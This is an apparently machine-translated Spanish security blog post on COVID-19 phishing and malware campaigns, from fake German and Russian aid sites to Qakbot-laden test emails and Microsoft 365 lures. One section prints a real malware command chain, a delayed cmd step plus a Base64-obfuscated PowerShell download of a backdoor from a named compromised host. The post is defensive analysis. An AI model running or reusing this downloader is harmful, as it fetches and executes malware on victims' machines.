Los atacantes continúan explotando el tema COVID-19, creando más y más amenazas para los usuarios que están muy interesados en todo lo relacionado con la epidemia. En una publicación anterior, ya hablamos sobre qué tipos de malware aparecieron a raíz del coronavirus, y hoy hablaremos sobre las técnicas de ingeniería social que los usuarios de diferentes países ya han encontrado, incluso en Rusia. Tendencias generales y ejemplos: debajo del corte.
¿Recuerdas la última vez que hablamos sobre cómo la gente lee fácilmente no solo sobre el coronavirus y el curso de la epidemia, sino también sobre las medidas de apoyo financiero? Aquí hay un buen ejemplo. En el estado alemán de Renania del Norte-Westfalia il NRW, se descubrió un curioso ataque de phishing. Los atacantes crearon copias del sitio web del Ministerio de Economía ( NRW Ministerio de Economía)), donde cualquiera puede presentar una solicitud de asistencia financiera. Tal programa realmente existe, y resultó estar en manos de estafadores. Habiendo recibido los datos personales de sus víctimas, ya presentaron una solicitud en el sitio web del Ministerio, pero indicaron otros datos bancarios. Según cifras oficiales, se hicieron 4 mil solicitudes falsas de este tipo hasta que se divulgó el plan. Como resultado, $ 109 millones destinados a ciudadanos afectados cayeron en manos de estafadores.
¿Quieres una prueba gratuita para COVID-19?
Otro ejemplo revelador de phishing de coronavirus se encontró en los correos electrónicos. Los mensajes han llamado la atención de los usuarios con una propuesta para someterse a pruebas gratuitas de infección por coronavirus. En el archivo adjunto de estas cartas había instancias de Trickbot / Qakbot / Qbot. Y cuando aquellos que querían verificar su salud comenzaron a "completar el formulario adjunto", se descargó un script malicioso en la computadora. Y para evitar la verificación por el método de sandboxing, el script comenzó a cargar el virus principal solo después de un tiempo, cuando los sistemas de seguridad estaban convencidos de que no se estaba produciendo ninguna actividad maliciosa.Convencer a la mayoría de los usuarios para habilitar macros también fue fácil. Para hacer esto, se usó un truco estándar, cuando para completar el cuestionario primero debe habilitar las macros, lo que significa que debe ejecutar el script VBA.
Como puede ver, el script VBA está especialmente enmascarado de los antivirus.
Windows tiene una función de espera cuando la aplicación espera / T <segundos> antes de aceptar la respuesta "Sí" de forma predeterminada. En nuestro caso, el script esperó 65 segundos antes de eliminar archivos temporales: y en el proceso de espera, se descargó el malware. Para hacer esto, se lanzó un script especial de PowerShell:cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
Después de decodificar el valor Base64, el script de PowerShell carga la puerta trasera ubicada en el servidor web previamente hackeado de Alemania:http://automatischer-staubsauger.com/feature/777777.png
y lo guarda con el nombre:C:\Users\Public\tmpdir\file1.exe
La carpeta ‘C:\Users\Public\tmpdir’se elimina cuando se ejecuta el archivo 'tmps1.bat', que contiene el comandocmd /c mkdir ""C:\Users\Public\tmpdir"".Ataque dirigido a agencias gubernamentales
Además, los analistas de FireEye informaron recientemente sobre un ataque dirigido por APT32 dirigido a las estructuras gubernamentales de Wuhan, así como al Ministerio de Gestión de Emergencias de China. Uno de los RTF distribuidos contenía un enlace a un artículo del New York Times titulado Actualizaciones en vivo de Coronavirus: China está rastreando a los viajeros desde Hubei . Sin embargo, al leerlo, se produjo la descarga de malware (los analistas de FireEye identificaron la instancia como METALJACK).Curiosamente, en el momento de la detección, ninguno de los antivirus detectó esta instancia según Virustotal.
Cuando los sitios oficiales "mienten"
El ejemplo más brillante de un ataque de phishing ocurrió en Rusia el otro día. La razón de esto fue el nombramiento de la asignación tan esperada para niños de 3 a 16 años. Cuando se anunció el inicio de la aceptación de solicitudes el 12 de mayo de 2020, millones acudieron al sitio web de los Servicios del Estado para recibir la tan esperada ayuda y derribaron el portal no peor que un ataque DDoS profesional. Cuando el presidente dijo que "los servicios estatales no podían hacer frente al flujo de solicitudes", comenzaron a hablar sobre el hecho de que un sitio alternativo para aceptar solicitudes había comenzado a funcionar.
El problema es que varios sitios se han ganado a la vez, y aunque uno, el real en posobie16.gosuslugi.ru, realmente acepta aplicaciones, docenas más recopilan datos personales de usuarios confiables .Los colegas de HeartInform encontraron alrededor de 30 nuevos dominios fraudulentos en la zona .ru. Infosecurity a Softline Company ha rastreado más de 70 sitios de servicios públicos falsos similares desde principios de abril. Sus creadores manipulan símbolos familiares y también usan combinaciones de las palabras gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, etc.Agiotage e Ingeniería Social
Todos estos ejemplos solo confirman que los atacantes monetizan con éxito el tema del coronavirus. Y cuanto mayor sea la tensión social y las preguntas menos claras, mayores serán las posibilidades de los estafadores de robar datos importantes, obligar a las personas a dar su dinero por su cuenta o simplemente piratear más computadoras.Y dado que la pandemia hizo que personas potencialmente no preparadas trabajasen desde casa en grandes cantidades, no solo los datos personales, sino también corporativos están en riesgo. Por ejemplo, recientemente los usuarios de Microsoft 365 (anteriormente Office 365) también han sido objeto de un ataque de phishing. Las personas recibieron masivamente mensajes de voz "perdidos" en los archivos adjuntos a las cartas. Sin embargo, de hecho, los archivos eran una página HTML que enviaba a las víctimas del ataque a la página de inicio de sesión falsa de Microsoft 365. Como resultado, pérdida de acceso y compromiso de todos los datos de la cuenta.